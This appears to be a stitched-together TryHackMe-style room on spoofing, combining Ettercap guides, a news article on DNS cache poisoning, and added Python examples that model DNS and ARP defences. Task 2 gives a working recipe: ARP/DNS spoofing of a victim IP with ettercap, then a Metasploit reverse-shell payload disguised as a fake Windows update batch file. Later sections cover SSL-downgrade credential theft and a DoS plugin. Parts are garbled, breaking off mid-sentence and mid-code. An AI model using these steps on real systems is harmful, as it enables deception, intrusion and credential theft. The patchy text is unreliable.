Tryhackme Spoofingattack


Spoofing attack tryhackme

How to make a spoofing attack masterfully: if you are looking for that, then you are in the right place.
It is sponsored by Emperor X.

Task 1 What is a spoofing attack


1. In the context of information security, and especially network security, a spoofing attack is a
situation in which a person or program successfully identifies as another by falsifying data, to gain
an illegitimate advantage.
2. Spoofing, as it pertains to cybersecurity, is when someone or something pretends to be something
else in an attempt to gain our confidence, get access to our systems, steal data, steal money, or
spread malware. Spoofing attacks come in many forms, including:
- Email spoofing
- Website and/or URL spoofing
- Caller ID spoofing
- Text message spoofing
- GPS spoofing
- Man-in-the-middle attacks
- Extension spoofing
- IP spoofing
- Facial spoofing

So how do the cybercriminals fool us? Often times, merely invoking the name of a big, trusted
organization is enough to get us to give up information or take some kind of action. For example, a
spoofed email from PayPal or Amazon might inquire about purchases you never made. Concerned about
your account, you might be motivated to click the included link.

From that malicious link, scammers will send you to a web page with a malware download or a faked
login page—complete with a familiar logo and spoofed URL—for the purpose of harvesting your
username and password.

There are many more ways a spoofing attack can play out. In all of them, fraudsters rely on victims
falling for the fake. If you never doubt the legitimacy of a website and never suspect an email of being
faked, then you could become a victim of a spoofing attack at some point.

To that end, this page is all about spoofing. We'll educate you on the types of spoofs, how spoofing
works, how to discern legitimate emails and websites from fake ones, and how to avoid becoming a
target for fraudsters.

----------------------------------------
1. Note: This attack stays confined to the internal network or the local network and does not
require any intervention from you.
2. A window that looks like the real window can appear in front of you, for a real site through which
your credit data is stolen, for example. Sometimes the sites themselves are not changed; the sites
are exploited as they are by spoofing the server.
3. Protection from this is very simple: use proxy networks and VPNs, because this attack is an inside
attack on the network, created by spoofing the server, the spoof being internal to the network where
it is convincing. Your phone or computer is the device that distributes the Internet service. What
black hats do is defraud the server that distributes the internal Internet or the local network, so that
the attacker's device becomes the device that distributes the Internet service.

Answer the questions below

Question: How do you protect yourself?
Hint: By using VPN and ????

Task 2 ettercap
First of all, go to the Kali Linux home directory. Move to the /etc/ettercap directory. Now edit the
etter.dns file.
Modify the contents of etter.dns and add your own PC's IP address as an A record.

Open a terminal. Now run the following command with the victim PC's IP address to spoof the victim PC:

ettercap -i eth0 -T -q -P dns_spoof -M arp /192.168.0.103//

It will activate the dns_spoof plug-in.

Open terminal and type msfconsole to open metasploit


Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit


Now copy this Powershell.exe code and save it as an update.bat file.

Now create a fake website page showing a Windows security update message. In the webpage, give
the hyperlink as the update.bat file.

Now save this webpage as index.html and paste it in the directory /var/www/html.
Now start the Apache server by writing the following command: service apache2 start

When the victim opens any web page, this page showing the Windows security update message will
be displayed.

When the victim clicks on the download update link and saves the batch file, the batch file will
execute automatically.

Now you will get control of the victim PC. Now type the following commands. Type sessions -l to
display the sessions opened when the victim opened the link. Now that the session has opened,
type sysinfo to get system information, then type shell to enter the victim's command prompt.
Answer the questions below
Here you understand how the attack works in a simple way, but there are other ways for the
attack to work; there is no explanation as simple as this one, but there remains a different way to
carry out this attack by using ettercap without the command prompt.
Task 3 What is Ettercap
Ettercap can be used by hackers to attack a network or by network administrators to defend it.
Find out about this pen-testing tool
Ettercap is a free, open-source tool that can be used for man-in-the-middle attacks on networks.
As such, it can be a threat to network security. However, network administrators need to be
aware of this tool to check the vulnerabilities of their systems.

What is Ettercap?
It is a packet capture tool that can write packets back onto the network. Thus, data streams can
be diverted and altered on the fly. The system can also be used for protocol analysis to analyze
network traffic and work out which applications generate the most traffic.

There is a GUI interface for Ettercap, and it is also possible to use Ettercap at the command line.
However, the interface is not so hot. Moreover, given the high standard of network monitoring
tools that network administrators are used to nowadays, it is unlikely that you would get Ettercap
to perform network traffic analysis.

The most common uses for Ettercap are man-in-the-middle attacks through ARP poisoning.
Additionally, hackers use this tool, and you can use it for penetration testing.

Ettercap operating system compatibility


Ettercap is primarily a tool for Linux and other Unix-like operating systems. It is available for the
following Linux distros:

Debian
Ubuntu
Kali
BackTrack
Mint
Fedora
Gentoo
Pentoo
OpenSuSe (unsupported)
CentOS (unsupported)
RHEL (unsupported)
The software will also run on Unix:

FreeBSD
OpenBSD
NetBSD
Solaris (unsupported)
Mac operating system versions that the official release notes say will run Ettercap are:

10.6 Snow Leopard
10.7 Lion
The release notes state that Ettercap can be installed on Windows, but this implementation is
not supported. There is a second version of Ettercap that is available for 32-bit systems running
Windows. The Windows versions mentioned by the developers are:

Windows Vista
Windows 7
Windows 8
Install Ettercap
The installation process is slightly different for each operating system.

Install Ettercap on Kali Linux


If you have Kali Linux, there isn’t anything that you need to do to install Ettercap. It is already
installed.

Install Ettercap on Ubuntu Linux


Go to the command line and enter the two commands:

sudo apt update
sudo apt install ettercap-common

Install Ettercap on Debian, BackTrack, and Mint Linux

Open a Terminal session and enter:

sudo apt update
sudo apt-get install ettercap-gtk

Install Ettercap on CentOS, Fedora, and RHEL


Issue the commands:

sudo yum update
sudo yum install ettercap

Install Ettercap on Windows Vista, Windows 7, and Windows 8


Go to the Web page
https://sourceforge.net/projects/ettercap/files/unofficial%20binaries/windows/

Click on the top .msi entry listed on the page.

Choose a directory to download the file.


Click on the installer file once it has been downloaded.

What is the best operating system for Ettercap

The latest version of the Windows-compatible package for Ettercap available on SourceForge was
posted in December 2011. Unfortunately, this is very old, and user feedback reports that the
system crashes frequently.

You will see several sites that claim to have a working version of Ettercap for Windows 10.
However, be careful – only download software from well-known sites, such as GitHub or
SourceForge. Hackers set up their download sites to lure in trusting members of the public. The
software you find on these sites is fake and contains malware instead of the promised utilities.
To summarize, there is no working version of Ettercap for Windows 10, and the version for Windows 7
and Windows 8 doesn’t work very well. The only serious version of Ettercap is available for Linux.
The system works well on any version of Linux. However, the best distro for using Ettercap is
probably Kali Linux.

Using Ettercap
You can test the resilience of your system settings by running a range of white hat hacker attacks
in a penetration testing exercise with the Ettercap utilities. The episodes you can emulate are:

Man-in-the-middle attacks
DNS spoofing
Credentials capture
DoS attack
Let’s take a look at each of these attacks and how you can implement them with Ettercap.

Man-in-the-middle attacks
In a man-in-the-middle attack, each side in a network conversation thinks they are exchanging
data with each other, but both are in fact communicating with the hacker. For example, A connects
to B, but the hacker intercepts the connection request and responds to A, pretending to be B.
Optionally, at the same time, the hacker might connect to B, pretending to be A. This second
connection would be necessary to extract data from B that will enable the hacker to convince A
that it is connected to B.

The primary motivation for the man-in-the-middle attack is to steal data from A so that the hacker
can later access B in the guise of A. In this case, the hacker doesn’t actively need to interact with
the victim, just watch traffic passing back and forth between the victim and the site on the Web.

A typical goal in this attack scenario would be to steal a user’s login credentials for a valuable
system, such as online banking. The same aim can be satisfied with phishing email scams, which
are technically easier to implement, and so currently, man-in-the-middle attacks are not so
prevalent.

There are two ways to divert traffic through your computer for manipulation, and both can be
implemented with Ettercap. The first of these is ARP poisoning, and the second is a DNS attack.
ARP poisoning is the easier method of the two and gives better results for a man-in-the-middle
attack on a local network. The ARP poisoning method lies at the heart of Ettercap’s attack
methodology.

Adjust the Ettercap configuration for ARP poisoning


First, update the Ettercap configuration file so that its capture keeps running as the superuser.

sudo vi /etc/ettercap/etter.conf

Look for the [privs] section in the file. Change the following two lines.

ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default


Save the file.

Set up the MITM attack


Make a note of your network’s router. Type the following command:

ip r
The results will state default via and then an IP address. This is the address of the router. Write it
down.

Start up Ettercap with its front-end graphical interface, with the command:

sudo -E ettercap -G

In this attack strategy, we will get the victim’s computer to believe our computer is the router.
The sending computer already knows the IP address of the router. We won’t change that. Instead,
we will link the MAC address of our computer to that IP address.

Click on Sniff in the top menu and then select Unified Sniffing from the drop-down menu. You will
see an Ettercap Input dialog box. Select the network interface that is on the same network as the
target computer and press OK.

Click on the Hosts option on the top menu and select Scan for hosts from the drop-down menu.
Next, click on the Hosts option again and choose Hosts List. This will show you the other devices
connected to the network. First, you need to work out which of these is your target computer.

The Hosts List shows the IP addresses of all computers connected to the network. Click on the line
for the target and click on the Add to Target 1 button. Next, click on the address of the network’s
router and press the Add to Target 2 button. You can add as many Target 1 addresses as you like.
For every Target 1 address you insert in this setup, the computer associated with that IP address
will have its traffic diverted through the computer running the Ettercap system. All other
computers will communicate with the router in the usual manner.

Click on the MITM option on the top menu and then on ARP poisoning. In the dialog box that
appears, select Sniff remote connections and then click on OK. Next, click on the Start option in
the top menu and then choose Start Sniffing. This remaps the IP address of the router to your
computer. The Ettercap system will forward the traffic to the actual router and channel responses
back to the target.

Run the MITM attack


Now you will receive all of the traffic from that target machine going to the router. Any HTTPS
connections will be downshifted to unprotected HTTP communication.

In the Ettercap interface, click on the View option on the top menu and select Connections from
the drop-down menu. Next, click on a line in the connection list shown in the central panel of the
interface to open a split board. This will show you the packet header data for the connection. If
the payload isn’t encrypted, you should be able to read the contents of the packet body.

DNS spoofing
To hijack traffic between a target and an external website to perform a man-in-the-middle attack,
you can use DNS spoofing. The domain name system cross-references Web domain names with
the actual IP addresses of the servers that host the pages for that site. Therefore, updating a local
DNS server to give your IP address for a domain will enable you to capture traffic to and from that
site.

The DNS spoofing option allows you to read and pass through all traffic or intercept it completely,
delivering your version of the desired website to the victim.

Adjust the Ettercap configuration for DNS spoofing


You need to alter the configuration file of your Ettercap instance to perform DNS spoofing. DNS
spoofing doesn’t replace the ARP poisoning technique explained in the previous section. You need
the ARP poisoning system to be active through Ettercap for the DNS spoofing service to work.

Edit the etter.dns file with Vi:

sudo vi /etc/ettercap/etter.dns

This file will be the local DNS database referred to by your target computer. This is the closest DNS
server to the victim, so any sites that aren’t mentioned in your local record will be referenced
through the next closest, which the victim’s DNS server will specify.

Enter a record for the website that you want to capture connections for. This should be in the
format <domain name> A <server IP address>. For example, if you want all traffic from the
victim’s computer to comparitech.com to be delivered to your computer on the network and
your local address is 127.0.0.3, the record you write in would be:

comparitech.com A 127.0.0.3

You can make as many entries as you like, and it is possible to point many different sites to the
same address.

Save the altered etter.dns file.

Run the DNS spoofing attack


When running these tests, you have the advantage of being inside the local network. A hacker
could use this tool to divert requests to any location on earth – the new server address doesn’t
have to be on the local network. However, with Ettercap, the interception provided by the ARP
poisoning has to be operating on the local network for this attack to work.

Go to the Ettercap interface. Remember, it should already be running ARP poisoning for one or
several victims on the network.

Click on Plugins in the top menu and then select Manage the plugins from the drop-down menu.
This will open a new tab in the interface and list all available plugins. Scan the list and find
dns_spoof. Double-click on this line to activate the service. This means that your etter.dns
becomes the local DNS server for the victim computers you have in your Target 1 hosts list.

Credentials capture
You can read the contents of passing packets in the Ettercap interface once ARP poisoning is
active. However, if the target computer uses HTTPS to communicate with websites, all of the
traffic will have the contents of the packet payload encrypted. The encryption key will be
negotiated between the two ends of the connection when contact is established. The easiest way
to break this protection is to remove the need for HTTPS. This stops the victim’s computer from
using HTTPS and forces it just to use HTTP to communicate with websites, thus leaving the
payload unencrypted and readable.

Go back to the etter.conf file and edit it:

sudo vi /etc/ettercap/etter.conf

Skip to the section that says # if you use iptables and remove the comment hash from the front of
the two redir lines. These downgrade SSL connections to unprotected HTTP. Save the file.

Now, when you go back to the Ettercap interface and View > Connections, you will be able to read
the packet contents and find the usernames and passwords passed within the HTTP protocol
message format.
DoS attack
You can completely block all web access for specific endpoints on your network through Ettercap.
To do this, you need to have the ARP poisoning attack, described above, operating. After that, the
block will work for all of the endpoints added to your Target 1 list.

Once the ARP poisoning is running, click on Plugins in the top menu and select Manage the plugins
from the drop-down list. This will show a list of available services. Scan down the list to find a line
for dos_attack. This is usually the following line after the dns_spoof entry. Double click on the
dos_attack line to activate the attack.

Defending against Ettercap


This guide has shown you a few easy tests to see how hackers can mess up the communications
on your network using Ettercap. Although Ettercap is known as a hacker tool, it has one weakness:
it needs to be running on a computer within a network to be effective.

In this guide, we looked at how to use Ettercap through its graphical user interface. However,
there is also a command-line version, and this could be set up without any visible indicators on
the targeted computer. A hacker could write scripts to install Ettercap and set an ARP poisoning
session running without the user seeing this background operation.

One way to defend against the use of Ettercap by hackers to damage your network security is to
scan every endpoint for the Ettercap process. This can easily be performed by any endpoint
detection and response (EDR) service, which will probably already be primed to spot and kill
Ettercap.

The most likely way that a hacker would get Ettercap running on one of your network’s endpoints
is to masquerade an installer program, which is also known as a “dropper”, as a PDF or a zip file
attached to an email. This would then activate once the conned user opened it. Thus, it is
essential to educate users against opening attachments on emails.

Ettercap FAQs
What is Ettercap used for?
Ettercap is a security analysis tool that emulates a “man in the middle” attack to detect system
vulnerabilities. The service deploys techniques such as ARP poisoning and password decryption to
capture traffic and insert fake responses into the stream. It can also be used for DoS attacks.

Is Ettercap a sniffer?
Ettercap was originally designed to be a packet sniffer, and that function is still at the heart of the
tool. Think of Ettercap as a packet sniffer with added functions. Those extra functions are now
considered to be the main reason to use Ettercap – for network attacks or penetration testing.

What is ARP spoofing vs ARP poisoning?


ARP Spoofing and ARP Poisoning are used to mean the same thing, which is altering address
resolution protocol records. “Spoofing” means impersonating, so ARP spoofing means
representing a computer with the IP address that was originally assigned to another computer’s
MAC address. In the interest of thoroughness, this should also include altering the relevant ARP
record. “Poisoning” means corrupting the ARP table. It is possible to implement spoofing without
poisoning. However, this relies on the tricked computer not checking ARP tables, so it is better to
implement poisoning as well.
Answer the questions below

Question: The most common uses for Ettercap are man-in-the-middle attacks ????????????
Hint: (are man-in-the-middle attacks through ARP poisoning. Additionally, hackers use this tool and
you can use it for penetration testing)
Task 4 This cabinet was attacked in 2008

DNS cache poisoning, the Internet attack from 2008, is back from the dead
A newly found side channel in a widely used protocol lets attackers spoof domains

In 2008, researcher Dan Kaminsky revealed one of the more severe Internet security threats ever:
a weakness in the domain name system that made it possible for attackers to send users en masse
to imposter sites instead of the real ones belonging to Google, Bank of America, or anyone else.
With industrywide coordination, thousands of DNS providers around the world installed a fix that
averted this doomsday scenario.
Now, Kaminsky’s DNS cache poisoning attack is back. Researchers on Wednesday presented a new
technique that can once again cause DNS resolvers to return maliciously spoofed IP addresses
instead of the site that rightfully corresponds to a domain name.
“This is a pretty big advancement that is similar to Kaminsky’s attack for some resolvers,
depending on how [they’re] actually run,” said Nick Sullivan, head of research at Cloudflare, a
content-delivery network that operates the 1.1.1.1 DNS service. “This is amongst the most
effective DNS cache poisoning attacks we’ve seen since Kaminsky’s attack. It’s something that, if
you do run a DNS resolver, you should take seriously.”
DNS primer
When people send emails, browse a website, or do just about anything else on the Internet, their
devices need a way to translate a domain name into the numerical IP address servers use to
locate other servers. The first place a device will look is a DNS resolver, which is a server or group
of servers that typically belong to the ISP, corporation, or large organization the user is connected
to.
In the event another user of the ISP or organization has recently interacted with the same domain,
the resolver will already have the corresponding IP address cached and will return the result. If
not, the resolver will query the dedicated authoritative server for that particular domain. The
authoritative server will then return a response, which the resolver will provide to the user and
temporarily store in its cache for any other users who may need it in the near future.
The entire process is unauthenticated, meaning the authoritative server uses no passwords or
other credentials to prove it is, in fact, authoritative. DNS lookups also occur using UDP packets,
which are sent in only one direction. The result is that UDP packets are usually trivial to spoof,
meaning someone can make UDP traffic appear to come from somewhere other than where it
really originated.
DNS cache poisoning: A recap
When Internet architects first devised the DNS, they recognized it was possible for someone to
impersonate an authoritative server and use the DNS to return malicious results to resolvers. To
protect against this possibility, the architects designed lookup transaction numbers. Resolvers
attached these 16-bit numbers to each request sent to an authoritative server. The resolver would
only accept a response if it contained the same ID.
What Kaminsky realized was that there were only 65,536 possible transaction IDs. An attacker
could exploit this limitation by flooding a DNS resolver with a malicious IP for a domain with slight
variations—for instance, 1.google.com, 2.google.com, and so on—and by including a different
transaction ID for each response. Eventually, an attacker would reproduce the correct number,
and the malicious IP would get fed to all users who relied on the resolver. The attack was called
DNS cache poisoning because it tainted the resolver's store of lookups.
The DNS ecosystem fixed the problem by exponentially increasing the amount of entropy required
for a response to be accepted. Whereas before, lookups and responses traveled only over port 53,
the new system randomized the port number that lookup requests used. For a DNS resolver to
accept the IP address, the response also had to include that same port number. Combined with the
transaction number, the entropy was measured in the billions, making it mathematically
infeasible for attackers to land on the correct combination.
Cache poisoning redux
On Wednesday, researchers from Tsinghua University and the University of California, Riverside
presented a technique that, once again, makes cache poisoning feasible. Their method exploits a
side channel that identifies the port number used in a lookup request. Once the attackers know
the number, they once again stand a high chance of successfully guessing the transaction ID.
The side channel in this case is the rate limit for ICMP, the abbreviation for the Internet Control
Message Protocol. To conserve bandwidth and computing resources, servers will respond to only
a set number of requests from other servers. After that, servers will provide no response at all.
Until recently, Linux always set this limit to 1,000 per second.

To exploit this side channel, the new spoofing technique floods a DNS resolver with a high number
of responses that are spoofed so they appear to come from the name server of the domain they
want to impersonate. Each response is sent over a different port.
When an attacker sends a response over the wrong

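To make the resolver's acceptance rule concrete (the 16-bit transaction ID, the randomized source port that the 2008 fix added, and why learning the port through a side channel collapses the guess space back to 65,536), the following Python is an added example; it is not code from the Ars Technica article quoted in this task nor from the TryHackMe room. It models a caching resolver that accepts a reply only when the transaction ID, the name server address, the destination port and the echoed question all match, keeps only in-bailiwick records, and computes the size of the (txid, port) guess space with and without port randomization. The `Resolver` class, `guess_space`, the simplified bailiwick rule and the TEST-NET addresses are assumptions of the example, not anything the article describes.

```python
import secrets
import struct

A_RECORD, IN_CLASS = 1, 1


def encode_name(name: str) -> bytes:
    """Wire-format a name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    return ".".join(labels), (end if end is not None else off)


def build_a_response(txid, qname, ip, answer_name=None, ttl=300):
    """One question plus one A record; owner name compressed to the question by default."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", A_RECORD, IN_CLASS)
    owner = b"\xc0\x0c" if answer_name is None else encode_name(answer_name)
    rr = owner + struct.pack("!HHIH", A_RECORD, IN_CLASS, ttl, 4) + bytes(int(x) for x in ip.split("."))
    return header + question + rr


def parse_response(msg: bytes):
    """Return (txid, [(qname, qtype, qclass)], [(name, rtype, ttl, rdata)])."""
    txid, _flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == A_RECORD and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return txid, questions, answers


class Resolver:
    """Caching resolver model: a reply counts only if every unpredictable field matches."""

    def __init__(self, randomize_port=True):
        self.randomize_port = randomize_port
        self.pending = {}  # txid -> (qname, name server ip, our source port)
        self.cache = {}    # name -> ip

    def send_query(self, qname, ns_ip):
        txid = secrets.randbelow(1 << 16)
        port = secrets.randbelow(65536 - 1024) + 1024 if self.randomize_port else 53
        self.pending[txid] = (qname, ns_ip, port)
        return txid, port

    def receive(self, src_ip, dst_port, payload):
        txid, questions, answers = parse_response(payload)
        if txid not in self.pending:
            return False  # wrong 16-bit transaction ID
        qname, ns_ip, port = self.pending[txid]
        if src_ip != ns_ip or dst_port != port:
            return False  # wrong server, or not the (randomized) port we sent from
        if questions != [(qname, A_RECORD, IN_CLASS)]:
            return False  # question section does not echo our query
        zone = qname.split(".", 1)[1]  # simplified bailiwick: parent of the queried name
        for name, rtype, _ttl, rdata in answers:
            if rtype == A_RECORD and (name == zone or name.endswith("." + zone)):
                self.cache[name] = rdata  # records outside the bailiwick are dropped
        del self.pending[txid]
        return True


def guess_space(randomized_port):
    """Distinct (txid, port) pairs a blind forger would have to cover."""
    return (1 << 16) * ((65536 - 1024) if randomized_port else 1)


def run_demo():
    """Constructed exchange: a forged reply on the wrong port, then the genuine one."""
    resolver = Resolver(randomize_port=True)
    ns_ip = "192.0.2.53"  # constructed TEST-NET address standing in for the authoritative server
    txid, port = resolver.send_query("www.example.com", ns_ip)
    forged = build_a_response(txid, "www.example.com", "198.51.100.1")
    forged_ok = resolver.receive(ns_ip, 53, forged)  # txid happens to match, port 53 is not ours
    genuine = build_a_response(txid, "www.example.com", "203.0.113.10")
    genuine_ok = resolver.receive(ns_ip, port, genuine)
    return {"forged_accepted": forged_ok, "genuine_accepted": genuine_ok,
            "cache": dict(resolver.cache),
            "guesses_fixed_port": guess_space(False), "guesses_random_port": guess_space(True)}
```

With a fixed port 53 the forger only has to cover the 65,536 transaction IDs; with a randomized port the combined space is 65,536 × 64,512, about 4.2 billion, which is the "billions" the article refers to. If a side channel reveals which port the resolver used, `guess_space` is effectively back to 65,536, which is why the ICMP rate-limit leak matters. In a real deployment a forged packet on the wrong port never reaches the resolver socket at all; the model rejects it explicitly only to make the check visible.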
Answer the questions below

In 2008, who discovered this threat?

Dan Kaminsky

What Kaminsky realized

was that there were only 65,536 possible transaction IDs

How do we know

Because the resolver can send only a fixed number of such ICMP messages in one
second, which means the attacker can also try to solicit such ICMP packets to itself

Task 5 ettercap spoofing MiTM attack explained

One of my favorite parts of the security awareness demonstration I give for companies is the
man-in-the-middle (MiTM) attack. In this, I explain the factors that make it possible for me to
become a man-in-the-middle, what the attack looks like from the attacker's and victim's
perspective, and what can be done to prevent this.
------------------------------------------------------------------------------------------------------------
During this attack I'm able to see a victim's network traffic and browsing behavior.
Weaponizing this possibility I then steal the victim's cookies, take over his web session and
change his profile picture on the website he's visiting to demonstrate the privileges I gained.
The reason I like this demonstration so much is that it really helps convey the importance of
security awareness on the audience's personal level. Moreover, the MiTM attack is a great
container for introducing several interesting techniques, concepts and tools, and executing
the attack brings these all together.

This is why I decided to put this knowledge in the article you are reading now.

Contents
During a man-in-the-middle attack an attacker places himself between two otherwise
interconnected devices. By doing this, the network traffic of both devices flows through the
attacker's machine, allowing him to intercept, read and modify the contents.

Since we're exploiting the ARP protocol to achieve this, the first chapter describes how this
protocol works. Then we'll dive into the scenario and theory of this exploit, followed by a
practical breakdown of the entire attack from both the attacker and the victim's perspective.
The last chapter describes how this attack can be prevented on a network level, in the
website configuration and what you can do as a client to avoid becoming a victim of this
attack. Shortcuts to the chapters are included below for quick reference:
---------------------------
The ARP protocol
The way the ARP protocol works is the reason it is open to an MiTM attack. So, in order to
understand the attack, a basic understanding of this protocol is required.

ARP stands for Address Resolution Protocol, which helps a network host make a translation
from the IP-address to the MAC-address. This is required in order for data to pass from the
OSI model's Network Layer (layer 3) to the Data Link layer (layer 2) and vice-versa.

Suppose Machine A needs to transfer data to Machine B. Zooming in to the lower levels of
the OSI model, it would need to pass through the Network layer, the Data Link layer and the
Physical layer (layer 1). For Machine A to be able to address Machine B, Machine A would
need to know the IP address of Machine B; information that is known in the Network layer.
The Data Link layer communicates using MAC addresses. So, a conversion needs to take place
from the IP address to the MAC address of Machine B (and vice-versa on the recipient
machine). This is illustrated in the image below:

OSI Model layers 1-3


The conversion from, or rather resolution of, the IP address into MAC address (and the other
way around) is where the ARP protocol comes into play. Both machines will have an ARP
table where the IP- and corresponding MAC-addresses of all known machines are stored.
Then how does Machine A get the MAC-address corresponding to the IP Address of Machine
B?

Machine A will just ask for it.

A simplification of the ARP protocol is depicted in the animation below:


ARP protocol

Let's briefly go over the 3 steps in the animation:

In the first step of the ARP protocol, Machine A sends out an ARP request. This is a broadcast to
the network with the question "Who has the MAC-address for the IP-address of Machine B?".

The machine that has this knowledge (usually Machine B itself) will send an ARP response stating
"MAC-address B is the MAC-address of Machine B".

Machine A receives the ARP response and writes (or updates) the entry in its ARP table.

The last step is exactly where the problem with this protocol lies. However, before we dive into its
issues, we'll take a look at the ARP packets being transmitted over the network.

ARP Network traffic

The image below displays a part of a network capture made with Wireshark.

ARP network capture

We can clearly see two packets with numbers 7 and 8 respectively.

Packet 7 contains the ARP request from a machine with MAC address ending with 56:e7 (source).
Its destination has MAC address ff:ff:ff:ff:ff:ff, which indicates it does not have a specific
destination; it's a broadcast message. The packet is summarized by Wireshark as "Who has
192.168.1.2? Tell 192.168.1.130".

Packet 8 is the ARP response from a machine with MAC address ending with 01:e7. The destination
has the MAC address of the originator (source) of packet 7. Wireshark summarizes its info as
"192.168.1.2 is at 00:50:56:ea:01:e7", which is actually the same MAC-address as the source of this
message. This means it was the machine itself responding to the request. Note that this ARP
response is aimed directly at the originator (source) of the ARP request (MAC-address 56:e7).

The lower section of the image shows the details of packet 7. Here we can clearly see the sender
is on IP-address 192.168.1.130 and that machine is looking for the MAC-address of 192.168.1.2.

Now let's check out the issue with this protocol.


ARP Spoofing

The fact that Machine A updates its ARP table with the info from
an ARP response without any question about the validity of this
information, opens the door for ARP spoofing (also known as ARP
poisoning).

An attacker might send a malicious ARP response, without any preceding request, containing his own MAC address and the IP address of another machine. The machine to which the response was directed will update its ARP table unquestioningly.

ARP spoofing

The image above depicts the same scenario as before. However, a hacker has now joined Machine A and B on the network. The hacker has done his work in the reconnaissance and scanning phases, and knows Machine A and B exist in the network and what IP addresses they have.

In this example, the hacker himself has IP-address H and MAC-address mac-H. He sends his malicious ARP response directed at Machine A with the message "mac-H is the MAC-address of IP-address B". Machine A updates its ARP table and IP-address B is now linked to MAC-address H.
From now on, every time Machine A wants to send a message to Machine B, it will translate the IP address of Machine B into MAC-address H, and the message will be sent to the hacker instead of Machine B.

Man-in-the-middle

We've seen how an attacker can make a machine send its data to
him instead of the intended destination by sending a
malicious ARP response. Now let's see how this technique can be
weaponized to become a man in the middle of two machines.

Consider the following scenario:

ARP spoofing scenario

In this scenario we see 3 actors: A Gateway, Adam and a Hacker.

At first we see Adam connected to the Internet via a Gateway. In this step, the hacker will be doing reconnaissance and scanning on the network to find out who else is present and what their IP- and MAC-addresses are.
The hacker then sends a malicious ARP response to both the Gateway and Adam. Basically, the hacker tells the Gateway that he is Adam and simultaneously tells Adam that he is the Gateway.

Both Gateway and Adam will update their ARP tables with their
new information. From then on, these nodes will start to send
their data to the hacker instead of each other. ARP spoof
completed!
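The two weaknesses described above (a host accepting any reply without question, and one MAC ending up behind two IP addresses) leave patterns on the wire that a defender can check for. The following Python script is an added example and is not part of this room: it parses raw Ethernet/ARP frames into the same summaries Wireshark shows, then replays a constructed capture of the Gateway/Adam scenario through a monitor that flags unsolicited replies, changed mappings and one MAC claiming several IPs. The gateway and attacker addresses are those used in the lab later on this page; the victim's full MAC is an assumption, since the page only gives its last two bytes (56:e7).

```python
"""Parse ARP frames and flag what an ARP-poisoning run leaves on the wire.
Added example, not from the original room. Sample frames are constructed."""
import struct

ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")   # RFC 826 ARP body, 28 bytes
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, eth_dst=None):
    """Assemble an Ethernet/ARP frame; used here only to construct sample input."""
    eth_dst = eth_dst or (BROADCAST if op == ARP_REQUEST else target_mac)
    eth = ETH_HDR.pack(mac_bytes(eth_dst), mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = ARP_HDR.pack(1, 0x0800, 6, 4, op, mac_bytes(sender_mac), ip_bytes(sender_ip),
                       mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields plus a Wireshark-style summary, or None if not ARP."""
    eth_dst, eth_src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, smac, sip, tmac, tip = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    pkt = {"op": op, "eth_src": mac_str(eth_src), "eth_dst": mac_str(eth_dst),
           "sender_mac": mac_str(smac), "sender_ip": ip_str(sip),
           "target_mac": mac_str(tmac), "target_ip": ip_str(tip)}
    if op == ARP_REQUEST:
        pkt["summary"] = f"Who has {pkt['target_ip']}? Tell {pkt['sender_ip']}"
    else:
        pkt["summary"] = f"{pkt['sender_ip']} is at {pkt['sender_mac']}"
    return pkt


class ArpMonitor:
    """Learns IP->MAC claims like a host's cache would, but alerts instead of
    silently overwriting, which is the behaviour ARP poisoning abuses."""

    def __init__(self):
        self.pending = set()   # (requester_ip, requested_ip) of requests seen
        self.table = {}        # ip -> mac learned from sender fields
        self.alerts = []

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None:
            return
        if pkt["op"] == ARP_REQUEST:
            self.pending.add((pkt["sender_ip"], pkt["target_ip"]))
        else:
            # A reply answers the request (requester, requested) = (target_ip, sender_ip)
            key = (pkt["target_ip"], pkt["sender_ip"])
            if key in self.pending:
                self.pending.discard(key)
            else:
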